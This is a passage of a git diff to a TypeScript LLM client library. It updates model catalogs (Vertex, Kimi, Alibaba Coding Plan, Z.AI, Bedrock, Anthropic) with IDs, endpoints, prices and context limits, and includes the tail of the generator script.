+			name: "Gemini 2.0 Flash Lite (Vertex)",
+			api: "google-vertex",
+			provider: "google-vertex",
+			baseUrl: VERTEX_BASE_URL,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 0.075, output: 0.3, cacheRead: 0.01875, cacheWrite: 0 },
+			contextWindow: 1048576,
+			maxTokens: 65536,
+		},
+		{
+			id: "gemini-2.5-pro",
+			name: "Gemini 2.5 Pro (Vertex)",
+			api: "google-vertex",
+			provider: "google-vertex",
+			baseUrl: VERTEX_BASE_URL,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 1.25, output: 10, cacheRead: 0.125, cacheWrite: 0 },
+			contextWindow: 1048576,
+			maxTokens: 65536,
+		},
+		{
+			id: "gemini-2.5-flash",
+			name: "Gemini 2.5 Flash (Vertex)",
+			api: "google-vertex",
+			provider: "google-vertex",
+			baseUrl: VERTEX_BASE_URL,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 0.3, output: 2.5, cacheRead: 0.03, cacheWrite: 0 },
+			contextWindow: 1048576,
+			maxTokens: 65536,
+		},
+		{
+			id: "gemini-2.5-flash-lite-preview-09-2025",
+			name: "Gemini 2.5 Flash Lite Preview 09-25 (Vertex)",
+			api: "google-vertex",
+			provider: "google-vertex",
+			baseUrl: VERTEX_BASE_URL,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 0.1, output: 0.4, cacheRead: 0.01, cacheWrite: 0 },
+			contextWindow: 1048576,
+			maxTokens: 65536,
+		},
+		{
+			id: "gemini-2.5-flash-lite",
+			name: "Gemini 2.5 Flash Lite (Vertex)",
+			api: "google-vertex",
+			provider: "google-vertex",
+			baseUrl: VERTEX_BASE_URL,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 0.1, output: 0.4, cacheRead: 0.01, cacheWrite: 0 },
+			contextWindow: 1048576,
+			maxTokens: 65536,
+		},
+		{
+			id: "gemini-1.5-pro",
+			name: "Gemini 1.5 Pro (Vertex)",
+			api: "google-vertex",
+			provider: "google-vertex",
+			baseUrl: VERTEX_BASE_URL,
+			reasoning: false,
+			input: ["text", "image"],
+			cost: { input: 1.25, output: 5, cacheRead: 0.3125, cacheWrite: 0 },
+			contextWindow: 1000000,
+			maxTokens: 8192,
+		},
+		{
+			id: "gemini-1.5-flash",
+			name: "Gemini 1.5 Flash (Vertex)",
+			api: "google-vertex",
+			provider: "google-vertex",
+			baseUrl: VERTEX_BASE_URL,
+			reasoning: false,
+			input: ["text", "image"],
+			cost: { input: 0.075, output: 0.3, cacheRead: 0.01875, cacheWrite: 0 },
+			contextWindow: 1000000,
+			maxTokens: 8192,
+		},
+		{
+			id: "gemini-1.5-flash-8b",
+			name: "Gemini 1.5 Flash-8B (Vertex)",
+			api: "google-vertex",
+			provider: "google-vertex",
+			baseUrl: VERTEX_BASE_URL,
+			reasoning: false,
+			input: ["text", "image"],
+			cost: { input: 0.0375, output: 0.15, cacheRead: 0.01, cacheWrite: 0 },
+			contextWindow: 1000000,
+			maxTokens: 8192,
+		},
+	];
+	allModels.push(...vertexModels);
+
+	// Kimi For Coding models (Moonshot AI's Anthropic-compatible coding API)
+	// Static fallback in case models.dev doesn't have them yet
+	const KIMI_CODING_BASE_URL = "https://api.kimi.com/coding";
+	const kimiCodingModels: Model<"anthropic-messages">[] = [
+		{
+			id: "kimi-k2-thinking",
+			name: "Kimi K2 Thinking",
+			api: "anthropic-messages",
+			provider: "kimi-coding",
+			baseUrl: KIMI_CODING_BASE_URL,
+			reasoning: true,
+			input: ["text"],
+			cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
+			contextWindow: 262144,
+			maxTokens: 32768,
+		},
+		{
+			id: "k2p5",
+			name: "Kimi K2.5",
+			api: "anthropic-messages",
+			provider: "kimi-coding",
+			baseUrl: KIMI_CODING_BASE_URL,
+			reasoning: true,
+			input: ["text"],
+			cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
+			contextWindow: 262144,
+			maxTokens: 32768,
+		},
+	];
+	// Only add if not already present from models.dev
+	for (const model of kimiCodingModels) {
+		if (!allModels.some(m => m.provider === "kimi-coding" && m.id === model.id)) {
+			allModels.push(model);
+		}
+	}
+
+	const azureOpenAiModels: Model<Api>[] = allModels
+		.filter((model) => model.provider === "openai" && model.api === "openai-responses")
+		.map((model) => ({
+			...model,
+			api: "azure-openai-responses",
+			provider: "azure-openai-responses",
+			baseUrl: "",
+		}));
+	allModels.push(...azureOpenAiModels);
+
+	// Group by provider and deduplicate by model ID
+	const providers: Record<string, Record<string, Model<any>>> = {};
+	for (const model of allModels) {
+		if (!providers[model.provider]) {
+			providers[model.provider] = {};
+		}
+		// Use model ID as key to automatically deduplicate
+		// Only add if not already present (models.dev takes priority over OpenRouter)
+		if (!providers[model.provider][model.id]) {
+			providers[model.provider][model.id] = model;
+		}
+	}
+
+	// Generate TypeScript file
+	let output = `// This file is auto-generated by scripts/generate-models.ts
+// Do not edit manually - run 'npm run generate-models' to update
+
+import type { Model } from "./types.js";
+
+export const MODELS = {
+`;
+
+	// Generate provider sections (sorted for deterministic output)
+	const sortedProviderIds = Object.keys(providers).sort();
+	for (const providerId of sortedProviderIds) {
+		const models = providers[providerId];
+		output += `\t${JSON.stringify(providerId)}: {\n`;
+
+		const sortedModelIds = Object.keys(models).sort();
+		for (const modelId of sortedModelIds) {
+			const model = models[modelId];
+			output += `\t\t"${model.id}": {\n`;
+			output += `\t\t\tid: "${model.id}",\n`;
+			output += `\t\t\tname: "${model.name}",\n`;
+			output += `\t\t\tapi: "${model.api}",\n`;
+			output += `\t\t\tprovider: "${model.provider}",\n`;
+			if (model.baseUrl !== undefined) {
+				output += `\t\t\tbaseUrl: "${model.baseUrl}",\n`;
+			}
+			if (model.headers) {
+				output += `\t\t\theaders: ${JSON.stringify(model.headers)},\n`;
+			}
+			if (model.compat) {
+				output += `			compat: ${JSON.stringify(model.compat)},
+`;
+			}
+			output += `\t\t\treasoning: ${model.reasoning},\n`;
+			output += `\t\t\tinput: [${model.input.map(i => `"${i}"`).join(", ")}],\n`;
+			output += `\t\t\tcost: {\n`;
+			output += `\t\t\t\tinput: ${model.cost.input},\n`;
+			output += `\t\t\t\toutput: ${model.cost.output},\n`;
+			output += `\t\t\t\tcacheRead: ${model.cost.cacheRead},\n`;
+			output += `\t\t\t\tcacheWrite: ${model.cost.cacheWrite},\n`;
+			output += `\t\t\t},\n`;
+			output += `\t\t\tcontextWindow: ${model.contextWindow},\n`;
+			output += `\t\t\tmaxTokens: ${model.maxTokens},\n`;
+			output += `\t\t} satisfies Model<"${model.api}">,\n`;
+		}
+
+		output += `\t},\n`;
+	}
+
+	output += `} as const;
+`;
+
+	// Write file
+	writeFileSync(join(packageRoot, "src/models.generated.ts"), output);
+	console.log("Generated src/models.generated.ts");
+
+	// Print statistics
+	const totalModels = allModels.length;
+	const reasoningModels = allModels.filter(m => m.reasoning).length;
+
+	console.log(`\nModel Statistics:`);
+	console.log(`  Total tool-capable models: ${totalModels}`);
+	console.log(`  Reasoning-capable models: ${reasoningModels}`);
+
+	for (const [provider, models] of Object.entries(providers)) {
+		console.log(`  ${provider}: ${Object.keys(models).length} models`);
+	}
+}
+
+// Run the generator
+generateModels().catch(console.error);
diff --git a/packages/pi-ai/src/env-api-keys.ts b/packages/pi-ai/src/env-api-keys.ts
index b6577d99d..1036c4b28 100644
--- a/packages/pi-ai/src/env-api-keys.ts
+++ b/packages/pi-ai/src/env-api-keys.ts
@@ -137,6 +137,7 @@ export function getEnvApiKey(provider: any): string | undefined {
 		"opencode-go": "OPENCODE_API_KEY",
 		"kimi-coding": "KIMI_API_KEY",
 		"alibaba-coding-plan": "ALIBABA_API_KEY",
+		ollama: "OLLAMA_API_KEY",
 		"ollama-cloud": "OLLAMA_API_KEY",
 		"custom-openai": "CUSTOM_OPENAI_API_KEY",
 	};
diff --git a/packages/pi-ai/src/index.ts b/packages/pi-ai/src/index.ts
index a75aaf7f4..c8d9e1e8c 100644
--- a/packages/pi-ai/src/index.ts
+++ b/packages/pi-ai/src/index.ts
@@ -27,4 +27,5 @@ export type {
 } from "./utils/oauth/types.js";
 export * from "./utils/overflow.js";
 export * from "./utils/typebox-helpers.js";
+export * from "./utils/repair-tool-json.js";
 export * from "./utils/validation.js";
diff --git a/packages/pi-ai/src/models.custom.ts b/packages/pi-ai/src/models.custom.ts
new file mode 100644
index 000000000..c3cc5ac04
--- /dev/null
+++ b/packages/pi-ai/src/models.custom.ts
@@ -0,0 +1,197 @@
+// Manually-maintained model definitions for providers NOT tracked by models.dev.
+//
+// The auto-generated file (models.generated.ts) is rebuilt from the models.dev
+// third-party catalog. Providers that use proprietary endpoints and are not
+// listed on models.dev must be defined here so they survive regeneration.
+//
+// See: https://github.com/gsd-build/gsd-2/issues/2339
+//
+// To add a custom provider:
+//   1. Add its model definitions below following the existing pattern.
+//   2. Add its API key mapping to env-api-keys.ts.
+//   3. Add its provider name to KnownProvider in types.ts (if not already there).
+
+import type { Model } from "./types.js";
+
+export const CUSTOM_MODELS = {
+	// ─── Alibaba Coding Plan ─────────────────────────────────────────────
+	// Direct Alibaba DashScope Coding Plan endpoint (OpenAI-compatible).
+	// NOT the same as alibaba/* models on OpenRouter — different endpoint & auth.
+	// Original PR: #295 | Fixes: #1003, #1055, #1057
+	"alibaba-coding-plan": {
+		"qwen3.5-plus": {
+			id: "qwen3.5-plus",
+			name: "Qwen3.5 Plus",
+			api: "openai-completions",
+			provider: "alibaba-coding-plan",
+			baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0,
+				output: 0,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 983616,
+			maxTokens: 65536,
+			compat: { thinkingFormat: "qwen", supportsDeveloperRole: false },
+		} satisfies Model<"openai-completions">,
+		"qwen3-max-2026-01-23": {
+			id: "qwen3-max-2026-01-23",
+			name: "Qwen3 Max 2026-01-23",
+			api: "openai-completions",
+			provider: "alibaba-coding-plan",
+			baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0,
+				output: 0,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 258048,
+			maxTokens: 32768,
+			compat: { thinkingFormat: "qwen", supportsDeveloperRole: false },
+		} satisfies Model<"openai-completions">,
+		"qwen3-coder-next": {
+			id: "qwen3-coder-next",
+			name: "Qwen3 Coder Next",
+			api: "openai-completions",
+			provider: "alibaba-coding-plan",
+			baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1",
+			reasoning: false,
+			input: ["text"],
+			cost: {
+				input: 0,
+				output: 0,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 204800,
+			maxTokens: 65536,
+			compat: { supportsDeveloperRole: false },
+		} satisfies Model<"openai-completions">,
+		"qwen3-coder-plus": {
+			id: "qwen3-coder-plus",
+			name: "Qwen3 Coder Plus",
+			api: "openai-completions",
+			provider: "alibaba-coding-plan",
+			baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1",
+			reasoning: false,
+			input: ["text"],
+			cost: {
+				input: 0,
+				output: 0,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 997952,
+			maxTokens: 65536,
+			compat: { supportsDeveloperRole: false },
+		} satisfies Model<"openai-completions">,
+		"MiniMax-M2.5": {
+			id: "MiniMax-M2.5",
+			name: "MiniMax M2.5",
+			api: "openai-completions",
+			provider: "alibaba-coding-plan",
+			baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0,
+				output: 0,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 196608,
+			maxTokens: 65536,
+			compat: {
+				supportsStore: false,
+				supportsDeveloperRole: false,
+				supportsReasoningEffort: true,
+				maxTokensField: "max_tokens",
+			},
+		} satisfies Model<"openai-completions">,
+		"glm-5": {
+			id: "glm-5",
+			name: "GLM-5",
+			api: "openai-completions",
+			provider: "alibaba-coding-plan",
+			baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0,
+				output: 0,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 202752,
+			maxTokens: 16384,
+			compat: { thinkingFormat: "qwen", supportsDeveloperRole: false },
+		} satisfies Model<"openai-completions">,
+		"glm-4.7": {
+			id: "glm-4.7",
+			name: "GLM-4.7",
+			api: "openai-completions",
+			provider: "alibaba-coding-plan",
+			baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0,
+				output: 0,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 169984,
+			maxTokens: 16384,
+			compat: { thinkingFormat: "qwen", supportsDeveloperRole: false },
+		} satisfies Model<"openai-completions">,
+		"kimi-k2.5": {
+			id: "kimi-k2.5",
+			name: "Kimi K2.5",
+			api: "openai-completions",
+			provider: "alibaba-coding-plan",
+			baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0,
+				output: 0,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 258048,
+			maxTokens: 32768,
+			compat: { thinkingFormat: "zai", supportsDeveloperRole: false },
+		} satisfies Model<"openai-completions">,
+	},
+
+	// ─── Z.AI (GLM-5.1) ────────────────────────────────────────────────
+	// GLM-5.1 is the latest GLM model from Zhipu AI, not yet in models.dev.
+	// Uses the Z.AI Coding Plan endpoint (OpenAI-compatible).
+	// Ref: https://docs.z.ai/devpack/using5.1
+	"zai": {
+		"glm-5.1": {
+			id: "glm-5.1",
+			name: "GLM-5.1",
+			api: "openai-completions",
+			provider: "zai",
+			baseUrl: "https://api.z.ai/api/coding/paas/v4",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 1,
+				output: 3.2,
+				cacheRead: 0.2,
+				cacheWrite: 0,
+			},
+			contextWindow: 204800,
+			maxTokens: 131072,
+			compat: { thinkingFormat: "zai", supportsDeveloperRole: false },
+		} satisfies Model<"openai-completions">,
+	},
+} as const;
diff --git a/packages/pi-ai/src/models.generated.ts b/packages/pi-ai/src/models.generated.ts
index ac56d2069..e62965533 100644
--- a/packages/pi-ai/src/models.generated.ts
+++ b/packages/pi-ai/src/models.generated.ts
@@ -90,40 +90,6 @@ export const MODELS = {
 			contextWindow: 300000,
 			maxTokens: 8192,
 		} satisfies Model<"bedrock-converse-stream">,
-		"amazon.titan-text-express-v1": {
-			id: "amazon.titan-text-express-v1",
-			name: "Titan Text G1 - Express",
-			api: "bedrock-converse-stream",
-			provider: "amazon-bedrock",
-			baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com",
-			reasoning: false,
-			input: ["text"],
-			cost: {
-				input: 0.2,
-				output: 0.6,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 128000,
-			maxTokens: 4096,
-		} satisfies Model<"bedrock-converse-stream">,
-		"amazon.titan-text-express-v1:0:8k": {
-			id: "amazon.titan-text-express-v1:0:8k",
-			name: "Titan Text G1 - Express",
-			api: "bedrock-converse-stream",
-			provider: "amazon-bedrock",
-			baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com",
-			reasoning: false,
-			input: ["text"],
-			cost: {
-				input: 0.2,
-				output: 0.6,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 128000,
-			maxTokens: 4096,
-		} satisfies Model<"bedrock-converse-stream">,
 		"anthropic.claude-3-5-haiku-20241022-v1:0": {
 			id: "anthropic.claude-3-5-haiku-20241022-v1:0",
 			name: "Claude Haiku 3.5",
@@ -209,40 +175,6 @@ export const MODELS = {
 			contextWindow: 200000,
 			maxTokens: 4096,
 		} satisfies Model<"bedrock-converse-stream">,
-		"anthropic.claude-3-opus-20240229-v1:0": {
-			id: "anthropic.claude-3-opus-20240229-v1:0",
-			name: "Claude Opus 3",
-			api: "bedrock-converse-stream",
-			provider: "amazon-bedrock",
-			baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com",
-			reasoning: false,
-			input: ["text", "image"],
-			cost: {
-				input: 15,
-				output: 75,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 200000,
-			maxTokens: 4096,
-		} satisfies Model<"bedrock-converse-stream">,
-		"anthropic.claude-3-sonnet-20240229-v1:0": {
-			id: "anthropic.claude-3-sonnet-20240229-v1:0",
-			name: "Claude Sonnet 3",
-			api: "bedrock-converse-stream",
-			provider: "amazon-bedrock",
-			baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com",
-			reasoning: false,
-			input: ["text", "image"],
-			cost: {
-				input: 3,
-				output: 15,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 200000,
-			maxTokens: 4096,
-		} satisfies Model<"bedrock-converse-stream">,
 		"anthropic.claude-haiku-4-5-20251001-v1:0": {
 			id: "anthropic.claude-haiku-4-5-20251001-v1:0",
 			name: "Claude Haiku 4.5",
@@ -325,7 +257,7 @@ export const MODELS = {
 				cacheRead: 0.5,
 				cacheWrite: 6.25,
 			},
-			contextWindow: 200000,
+			contextWindow: 1000000,
 			maxTokens: 128000,
 		} satisfies Model<"bedrock-converse-stream">,
 		"anthropic.claude-sonnet-4-20250514-v1:0": {
@@ -376,43 +308,9 @@ export const MODELS = {
 				cacheRead: 0.3,
 				cacheWrite: 3.75,
 			},
-			contextWindow: 200000,
+			contextWindow: 1000000,
 			maxTokens: 64000,
 		} satisfies Model<"bedrock-converse-stream">,
-		"cohere.command-r-plus-v1:0": {
-			id: "cohere.command-r-plus-v1:0",
-			name: "Command R+",
-			api: "bedrock-converse-stream",
-			provider: "amazon-bedrock",
-			baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com",
-			reasoning: false,
-			input: ["text"],
-			cost: {
-				input: 3,
-				output: 15,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 128000,
-			maxTokens: 4096,
-		} satisfies Model<"bedrock-converse-stream">,
-		"cohere.command-r-v1:0": {
-			id: "cohere.command-r-v1:0",
-			name: "Command R",
-			api: "bedrock-converse-stream",
-			provider: "amazon-bedrock",
-			baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com",
-			reasoning: false,
-			input: ["text"],
-			cost: {
-				input: 0.5,
-				output: 1.5,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 128000,
-			maxTokens: 4096,
-		} satisfies Model<"bedrock-converse-stream">,
 		"deepseek.r1-v1:0": {
 			id: "deepseek.r1-v1:0",
 			name: "DeepSeek-R1",
@@ -447,8 +345,8 @@ export const MODELS = {
 			contextWindow: 163840,
 			maxTokens: 81920,
 		} satisfies Model<"bedrock-converse-stream">,
-		"deepseek.v3.2-v1:0": {
-			id: "deepseek.v3.2-v1:0",
+		"deepseek.v3.2": {
+			id: "deepseek.v3.2",
 			name: "DeepSeek-V3.2",
 			api: "bedrock-converse-stream",
 			provider: "amazon-bedrock",
@@ -512,7 +410,7 @@ export const MODELS = {
 				cacheRead: 0.5,
 				cacheWrite: 6.25,
 			},
-			contextWindow: 200000,
+			contextWindow: 1000000,
 			maxTokens: 128000,
 		} satisfies Model<"bedrock-converse-stream">,
 		"eu.anthropic.claude-sonnet-4-20250514-v1:0": {
@@ -563,7 +461,7 @@ export const MODELS = {
 				cacheRead: 0.3,
 				cacheWrite: 3.75,
 			},
-			contextWindow: 200000,
+			contextWindow: 1000000,
 			maxTokens: 64000,
 		} satisfies Model<"bedrock-converse-stream">,
 		"global.anthropic.claude-haiku-4-5-20251001-v1:0": {
@@ -614,7 +512,7 @@ export const MODELS = {
 				cacheRead: 0.5,
 				cacheWrite: 6.25,
 			},
-			contextWindow: 200000,
+			contextWindow: 1000000,
 			maxTokens: 128000,
 		} satisfies Model<"bedrock-converse-stream">,
 		"global.anthropic.claude-sonnet-4-20250514-v1:0": {
@@ -665,7 +563,7 @@ export const MODELS = {
 				cacheRead: 0.3,
 				cacheWrite: 3.75,
 			},
-			contextWindow: 200000,
+			contextWindow: 1000000,
 			maxTokens: 64000,
 		} satisfies Model<"bedrock-converse-stream">,
 		"google.gemma-3-27b-it": {
@@ -702,6 +600,23 @@ export const MODELS = {
 			contextWindow: 128000,
 			maxTokens: 4096,
 		} satisfies Model<"bedrock-converse-stream">,
+		"meta.llama3-1-405b-instruct-v1:0": {
+			id: "meta.llama3-1-405b-instruct-v1:0",
+			name: "Llama 3.1 405B Instruct",
+			api: "bedrock-converse-stream",
+			provider: "amazon-bedrock",
+			baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com",
+			reasoning: false,
+			input: ["text"],
+			cost: {
+				input: 2.4,
+				output: 2.4,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 128000,
+			maxTokens: 4096,
+		} satisfies Model<"bedrock-converse-stream">,
 		"meta.llama3-1-70b-instruct-v1:0": {
 			id: "meta.llama3-1-70b-instruct-v1:0",
 			name: "Llama 3.1 70B Instruct",
@@ -889,6 +804,40 @@ export const MODELS = {
 			contextWindow: 204800,
 			maxTokens: 131072,
 		} satisfies Model<"bedrock-converse-stream">,
+		"mistral.devstral-2-123b": {
+			id: "mistral.devstral-2-123b",
+			name: "Devstral 2 123B",
+			api: "bedrock-converse-stream",
+			provider: "amazon-bedrock",
+			baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com",
+			reasoning: false,
+			input: ["text"],
+			cost: {
+				input: 0.4,
+				output: 2,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 256000,
+			maxTokens: 8192,
+		} satisfies Model<"bedrock-converse-stream">,
+		"mistral.magistral-small-2509": {
+			id: "mistral.magistral-small-2509",
+			name: "Magistral Small 1.2",
+			api: "bedrock-converse-stream",
+			provider: "amazon-bedrock",
+			baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0.5,
+				output: 1.5,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 128000,
+			maxTokens: 40000,
+		} satisfies Model<"bedrock-converse-stream">,
 		"mistral.ministral-3-14b-instruct": {
 			id: "mistral.ministral-3-14b-instruct",
 			name: "Ministral 14B 3.0",
@@ -906,6 +855,23 @@ export const MODELS = {
 			contextWindow: 128000,
 			maxTokens: 4096,
 		} satisfies Model<"bedrock-converse-stream">,
+		"mistral.ministral-3-3b-instruct": {
+			id: "mistral.ministral-3-3b-instruct",
+			name: "Ministral 3 3B",
+			api: "bedrock-converse-stream",
+			provider: "amazon-bedrock",
+			baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com",
+			reasoning: false,
+			input: ["text", "image"],
+			cost: {
+				input: 0.1,
+				output: 0.1,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 256000,
+			maxTokens: 8192,
+		} satisfies Model<"bedrock-converse-stream">,
 		"mistral.ministral-3-8b-instruct": {
 			id: "mistral.ministral-3-8b-instruct",
 			name: "Ministral 3 8B",
@@ -923,22 +889,39 @@ export const MODELS = {
 			contextWindow: 128000,
 			maxTokens: 4096,
 		} satisfies Model<"bedrock-converse-stream">,
-		"mistral.mistral-large-2402-v1:0": {
-			id: "mistral.mistral-large-2402-v1:0",
-			name: "Mistral Large (24.02)",
+		"mistral.mistral-large-3-675b-instruct": {
+			id: "mistral.mistral-large-3-675b-instruct",
+			name: "Mistral Large 3",
 			api: "bedrock-converse-stream",
 			provider: "amazon-bedrock",
 			baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com",
 			reasoning: false,
-			input: ["text"],
+			input: ["text", "image"],
 			cost: {
 				input: 0.5,
 				output: 1.5,
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
+			contextWindow: 256000,
+			maxTokens: 8192,
+		} satisfies Model<"bedrock-converse-stream">,
+		"mistral.pixtral-large-2502-v1:0": {
+			id: "mistral.pixtral-large-2502-v1:0",
+			name: "Pixtral Large (25.02)",
+			api: "bedrock-converse-stream",
+			provider: "amazon-bedrock",
+			baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com",
+			reasoning: false,
+			input: ["text", "image"],
+			cost: {
+				input: 2,
+				output: 6,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
 			contextWindow: 128000,
-			maxTokens: 4096,
+			maxTokens: 8192,
 		} satisfies Model<"bedrock-converse-stream">,
 		"mistral.voxtral-mini-3b-2507": {
 			id: "mistral.voxtral-mini-3b-2507",
@@ -1025,6 +1008,23 @@ export const MODELS = {
 			contextWindow: 128000,
 			maxTokens: 4096,
 		} satisfies Model<"bedrock-converse-stream">,
+		"nvidia.nemotron-nano-3-30b": {
+			id: "nvidia.nemotron-nano-3-30b",
+			name: "NVIDIA Nemotron Nano 3 30B",
+			api: "bedrock-converse-stream",
+			provider: "amazon-bedrock",
+			baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0.06,
+				output: 0.24,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 128000,
+			maxTokens: 4096,
+		} satisfies Model<"bedrock-converse-stream">,
 		"nvidia.nemotron-nano-9b-v2": {
 			id: "nvidia.nemotron-nano-9b-v2",
 			name: "NVIDIA Nemotron Nano 9B v2",
@@ -1294,7 +1294,7 @@ export const MODELS = {
 				cacheRead: 0.5,
 				cacheWrite: 6.25,
 			},
-			contextWindow: 200000,
+			contextWindow: 1000000,
 			maxTokens: 128000,
 		} satisfies Model<"bedrock-converse-stream">,
 		"us.anthropic.claude-sonnet-4-20250514-v1:0": {
@@ -1345,7 +1345,7 @@ export const MODELS = {
 				cacheRead: 0.3,
 				cacheWrite: 3.75,
 			},
-			contextWindow: 200000,
+			contextWindow: 1000000,
 			maxTokens: 64000,
 		} satisfies Model<"bedrock-converse-stream">,
 		"writer.palmyra-x4-v1:0": {
@@ -1721,23 +1721,6 @@ export const MODELS = {
 				cacheRead: 0.5,
 				cacheWrite: 6.25,
 			},
-			contextWindow: 200000,
-			maxTokens: 128000,
-		} satisfies Model<"anthropic-messages">,
-		"claude-opus-4-6[1m]": {
-			id: "claude-opus-4-6[1m]",
-			name: "Claude Opus 4.6 (1M)",
-			api: "anthropic-messages",
-			provider: "anthropic",
-			baseUrl: "https://api.anthropic.com",
-			reasoning: true,
-			input: ["text", "image"],
-			cost: {
-				input: 5,
-				output: 25,
-				cacheRead: 0.5,
-				cacheWrite: 6.25,
-			},
 			contextWindow: 1000000,
 			maxTokens: 128000,
 		} satisfies Model<"anthropic-messages">,
@@ -1823,182 +1806,10 @@ export const MODELS = {
 				cacheRead: 0.3,
 				cacheWrite: 3.75,
 			},
-			contextWindow: 200000,
+			contextWindow: 1000000,
 			maxTokens: 64000,
 		} satisfies Model<"anthropic-messages">,
 	},
-	"anthropic-vertex": {
-		"claude-opus-4-6": {
-			id: "claude-opus-4-6",
-			name: "Claude Opus 4.6 (Vertex)",
-			api: "anthropic-vertex",
-			provider: "anthropic-vertex",
-			baseUrl: "https://us-central1-aiplatform.googleapis.com",
-			reasoning: true,
-			input: ["text", "image"],
-			cost: {
-				input: 15,
-				output: 75,
-				cacheRead: 1.5,
-				cacheWrite: 18.75,
-			},
-			contextWindow: 200000,
-			maxTokens: 128000,
-		} satisfies Model<"anthropic-vertex">,
-		"claude-opus-4-6[1m]": {
-			id: "claude-opus-4-6[1m]",
-			name: "Claude Opus 4.6 1M (Vertex)",
-			api: "anthropic-vertex",
-			provider: "anthropic-vertex",
-			baseUrl: "https://us-central1-aiplatform.googleapis.com",
-			reasoning: true,
-			input: ["text", "image"],
-			cost: {
-				input: 15,
-				output: 75,
-				cacheRead: 1.5,
-				cacheWrite: 18.75,
-			},
-			contextWindow: 1000000,
-			maxTokens: 128000,
-		} satisfies Model<"anthropic-vertex">,
-		"claude-sonnet-4-6": {
-			id: "claude-sonnet-4-6",
-			name: "Claude Sonnet 4.6 (Vertex)",
-			api: "anthropic-vertex",
-			provider: "anthropic-vertex",
-			baseUrl: "https://us-central1-aiplatform.googleapis.com",
-			reasoning: true,
-			input: ["text", "image"],
-			cost: {
-				input: 3,
-				output: 15,
-				cacheRead: 0.3,
-				cacheWrite: 3.75,
-			},
-			contextWindow: 200000,
-			maxTokens: 64000,
-		} satisfies Model<"anthropic-vertex">,
-		"claude-sonnet-4-6[1m]": {
-			id: "claude-sonnet-4-6[1m]",
-			name: "Claude Sonnet 4.6 1M (Vertex)",
-			api: "anthropic-vertex",
-			provider: "anthropic-vertex",
-			baseUrl: "https://us-central1-aiplatform.googleapis.com",
-			reasoning: true,
-			input: ["text", "image"],
-			cost: {
-				input: 3,
-				output: 15,
-				cacheRead: 0.3,
-				cacheWrite: 3.75,
-			},
-			contextWindow: 1000000,
-			maxTokens: 64000,
-		} satisfies Model<"anthropic-vertex">,
-		"claude-sonnet-4-5@20250929": {
-			id: "claude-sonnet-4-5@20250929",
-			name: "Claude Sonnet 4.5 (Vertex)",
-			api: "anthropic-vertex",
-			provider: "anthropic-vertex",
-			baseUrl: "https://us-central1-aiplatform.googleapis.com",
-			reasoning: true,
-			input: ["text", "image"],
-			cost: {
-				input: 3,
-				output: 15,
-				cacheRead: 0.3,
-				cacheWrite: 3.75,
-			},
-			contextWindow: 200000,
-			maxTokens: 64000,
-		} satisfies Model<"anthropic-vertex">,
-		"claude-sonnet-4@20250514": {
-			id: "claude-sonnet-4@20250514",
-			name: "Claude Sonnet 4 (Vertex)",
